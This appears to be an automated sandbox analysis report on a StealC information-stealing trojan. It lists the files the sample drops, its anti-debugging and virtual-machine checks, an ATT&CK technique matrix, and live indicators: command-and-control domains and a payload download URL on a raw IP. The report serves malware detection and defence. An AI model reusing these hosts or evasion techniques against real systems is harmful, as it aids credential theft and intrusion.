      Source: ScreenUpdateSync[1].exe.0.drStatic PE information: section name: .text entropy: 7.372861140072552
      Source: E093.tmp.exe.0.drStatic PE information: section name: .text entropy: 7.372861140072552
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeFile created: C:\Users\user\AppData\Local\Temp\E093.tmp.exeJump to dropped file
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZRZDXR93\ScreenUpdateSync[1].exeJump to dropped file
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_0040E974 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0040E974
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeWindow / User API: threadDelayed 9642Jump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-65569
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeAPI coverage: 5.1 %
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exe TID: 6592Thread sleep count: 344 > 30Jump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exe TID: 6592Thread sleep time: -248368s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exe TID: 6592Thread sleep count: 9642 > 30Jump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exe TID: 6592Thread sleep time: -6961524s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe TID: 6812Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe TID: 5964Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_004389F2 FindFirstFileExW,0_2_004389F2
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_024D8C59 FindFirstFileExW,0_2_024D8C59
      Source: Amcache.hve.8.drBinary or memory string: VMware
      Source: Amcache.hve.8.drBinary or memory string: VMware Virtual USB Mouse
      Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin
      Source: Amcache.hve.8.drBinary or memory string: VMware, Inc.
      Source: Amcache.hve.8.drBinary or memory string: VMware20,1hbin@
      Source: Amcache.hve.8.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
      Source: Amcache.hve.8.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.8.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
      Source: sqJIHyPqhr.exe, 00000000.00000002.4891698333.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp, sqJIHyPqhr.exe, 00000000.00000002.4891698333.0000000000A16000.00000004.00000020.00020000.00000000.sdmp, E093.tmp.exe, 00000004.00000003.2580522241.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, E093.tmp.exe, 00000004.00000002.2679041344.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, E093.tmp.exe, 00000004.00000002.2679106229.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, E093.tmp.exe, 00000004.00000003.2580784849.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, E093.tmp.exe, 00000004.00000003.2580939365.0000000000A05000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: Amcache.hve.8.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.8.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
      Source: sqJIHyPqhr.exe, 00000000.00000003.4761468852.0000000003311000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\7
      Source: Amcache.hve.8.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
      Source: Amcache.hve.8.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.8.drBinary or memory string: vmci.sys
      Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin`
      Source: Amcache.hve.8.drBinary or memory string: \driver\vmci,\driver\pci
      Source: Amcache.hve.8.drBinary or memory string: VMware-42 27 6e d0 59 6b 97 52-b4 9a 7f 42 1f 0e 66 9c
      Source: Amcache.hve.8.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.8.drBinary or memory string: VMware20,1
      Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Generation Counter
      Source: Amcache.hve.8.drBinary or memory string: NECVMWar VMware SATA CD00
      Source: Amcache.hve.8.drBinary or memory string: VMware Virtual disk SCSI Disk Device
      Source: Amcache.hve.8.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
      Source: Amcache.hve.8.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
      Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
      Source: Amcache.hve.8.drBinary or memory string: VMware PCI VMCI Bus Device
      Source: Amcache.hve.8.drBinary or memory string: VMware VMCI Bus Device
      Source: Amcache.hve.8.drBinary or memory string: VMware Virtual RAM
      Source: Amcache.hve.8.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
      Source: E093.tmp.exe, 00000004.00000002.2679106229.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, E093.tmp.exe, 00000004.00000003.2580784849.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, E093.tmp.exe, 00000004.00000003.2580939365.0000000000A05000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWC
      Source: Amcache.hve.8.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0043C1F0 LdrInitializeThunk,4_2_0043C1F0
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3D3
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC5E
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_0042FE5F mov eax, dword ptr fs:[00000030h]0_2_0042FE5F
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_009D9D33 push dword ptr fs:[00000030h]0_2_009D9D33
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_024D00C6 mov eax, dword ptr fs:[00000030h]0_2_024D00C6
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_024A092B mov eax, dword ptr fs:[00000030h]0_2_024A092B
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_024A0D90 mov eax, dword ptr fs:[00000030h]0_2_024A0D90
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_008F092B mov eax, dword ptr fs:[00000030h]4_2_008F092B
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_008F0D90 mov eax, dword ptr fs:[00000030h]4_2_008F0D90
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeCode function: 4_2_0099998B push dword ptr fs:[00000030h]4_2_0099998B
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_0043BBC1 GetProcessHeap,0_2_0043BBC1
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3D3
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_004104D3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004104D3
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_00410666 SetUnhandledExceptionFilter,0_2_00410666
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_0040F911 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040F911
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_024CA63A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_024CA63A
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_024B073A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_024B073A
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_024AFB78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_024AFB78
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_024B08CD SetUnhandledExceptionFilter,0_2_024B08CD

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: E093.tmp.exeString found in binary or memory: rapeflowwj.lat
      Source: E093.tmp.exeString found in binary or memory: crosshuaht.lat
      Source: E093.tmp.exeString found in binary or memory: sustainskelet.lat
      Source: E093.tmp.exeString found in binary or memory: aspecteirs.lat
      Source: E093.tmp.exeString found in binary or memory: energyaffai.lat
      Source: E093.tmp.exeString found in binary or memory: necklacebudi.lat
      Source: E093.tmp.exeString found in binary or memory: discokeyus.lat
      Source: E093.tmp.exeString found in binary or memory: grannyejh.lat
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeProcess created: C:\Users\user\AppData\Local\Temp\E093.tmp.exe "C:\Users\user\AppData\Local\Temp\E093.tmp.exe" Jump to behavior
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_0041077B cpuid 0_2_0041077B
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0043B00A
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: GetLocaleInfoW,0_2_004351C0
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: EnumSystemLocalesW,0_2_0043B2CD
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: EnumSystemLocalesW,0_2_0043B282
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: EnumSystemLocalesW,0_2_0043B368
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B3F5
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: GetLocaleInfoW,0_2_0043B645
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0043B76E
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: GetLocaleInfoW,0_2_0043B875
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B942
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: EnumSystemLocalesW,0_2_00434DCD
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_024DB271
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: EnumSystemLocalesW,0_2_024D5034
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: GetLocaleInfoW,0_2_024D5427
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: EnumSystemLocalesW,0_2_024DB4E9
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: EnumSystemLocalesW,0_2_024DB534
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: EnumSystemLocalesW,0_2_024DB5CF
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: GetLocaleInfoW,0_2_024DBADC
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_024DBBA9
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: GetLocaleInfoW,0_2_024DB8AC
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: GetLocaleInfoW,0_2_024DB8A3
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_024DB9D5
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_004103CD GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_004103CD
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_004163EA GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,0_2_004163EA
      Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: Amcache.hve.8.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
      Source: Amcache.hve.8.drBinary or memory string: msmpeng.exe
      Source: Amcache.hve.8.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
      Source: Amcache.hve.8.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
      Source: Amcache.hve.8.drBinary or memory string: MsMpEng.exe

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_004218CC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_004218CC
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_00420BF6 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_00420BF6
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_024C1B33 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_024C1B33
      Source: C:\Users\user\Desktop\sqJIHyPqhr.exeCode function: 0_2_024C0E5D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_024C0E5D
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
      Native API
      1
      DLL Side-Loading
      11
      Process Injection
      1
      Masquerading
      OS Credential Dumping1
      System Time Discovery
      Remote Services1
      Archive Collected Data
      11
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      PowerShell
      Boot or Logon Initialization Scripts1
      DLL Side-Loading
      1
      Virtualization/Sandbox Evasion
      LSASS Memory1
      Query Registry
      Remote Desktop Protocol3
      Clipboard Data
      12
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
      Process Injection
      Security Account Manager131
      Security Software Discovery
      SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
      Deobfuscate/Decode Files or Information
      NTDS1
      Virtualization/Sandbox Evasion
      Distributed Component Object ModelInput Capture124
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script4
      Obfuscated Files or Information
      LSA Secrets1
      Process Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts22
      Software Packing
      Cached Domain Credentials1
      Application Window Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      DLL Side-Loading
      DCSync2
      File and Directory Discovery
      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem24
      System Information Discovery
      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      sqJIHyPqhr.exe74%ReversingLabsWin32.Trojan.StealC
      sqJIHyPqhr.exe100%Joe Sandbox ML
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZRZDXR93\ScreenUpdateSync[1].exe100%AviraHEUR/AGEN.1312567
      C:\Users\user\AppData\Local\Temp\E093.tmp.exe100%AviraHEUR/AGEN.1312567
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZRZDXR93\ScreenUpdateSync[1].exe100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Temp\E093.tmp.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZRZDXR93\ScreenUpdateSync[1].exe68%ReversingLabsWin32.Trojan.StealC
      C:\Users\user\AppData\Local\Temp\E093.tmp.exe68%ReversingLabsWin32.Trojan.StealC
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://rapeflowwj.lat/6100%Avira URL Cloudmalware
      http://176.113.115.19/ScreenUpdateSync.exey0%Avira URL Cloudsafe
      https://rapeflowwj.lat/apiN100%Avira URL Cloudmalware
      https://rapeflowwj.lat/apip100%Avira URL Cloudmalware
      https://rapeflowwj.lat/Y100%Avira URL Cloudmalware
      https://rapeflowwj.lat/apis100%Avira URL Cloudmalware
      https://post-to-me.com/track_prt.php?sub=0&cc=DEf6100%Avira URL Cloudmalware
      https://rapeflowwj.lat/100%Avira URL Cloudmalware
      https://rapeflowwj.lat/api1100%Avira URL Cloudmalware
      http://176.113.115.19/0%Avira URL Cloudsafe
      https://rapeflowwj.lat/api100%Avira URL Cloudmalware
      NameIPActiveMaliciousAntivirus DetectionReputation
      post-to-me.com
      172.67.179.207
      truefalse
        high
        rapeflowwj.lat
        172.67.220.223
        truetrue
          unknown
          NameMaliciousAntivirus DetectionReputation
          necklacebudi.latfalse
            high
            aspecteirs.latfalse
              high
              energyaffai.latfalse
                high
                https://post-to-me.com/track_prt.php?sub=0&cc=DEfalse
                  high
                  sustainskelet.latfalse
                    high
                    crosshuaht.latfalse
                      high
                      rapeflowwj.latfalse
                        high
                        grannyejh.latfalse
                          high
                          discokeyus.latfalse
                            high
                            https://rapeflowwj.lat/apitrue
                            • Avira URL Cloud: malware
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://post-to-me.com/track_prt.php?sub=&cc=DEsqJIHyPqhr.exe, 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
                              high
                              https://rapeflowwj.lat/E093.tmp.exe, 00000004.00000002.2679057343.00000000009E8000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              unknown
                              https://rapeflowwj.lat/6E093.tmp.exe, 00000004.00000002.2679057343.00000000009E8000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              unknown
                              http://upx.sf.netAmcache.hve.8.drfalse
                                high
                                http://176.113.115.19/ScreenUpdateSync.exesqJIHyPqhr.exe, 00000000.00000002.4891698333.0000000000A16000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
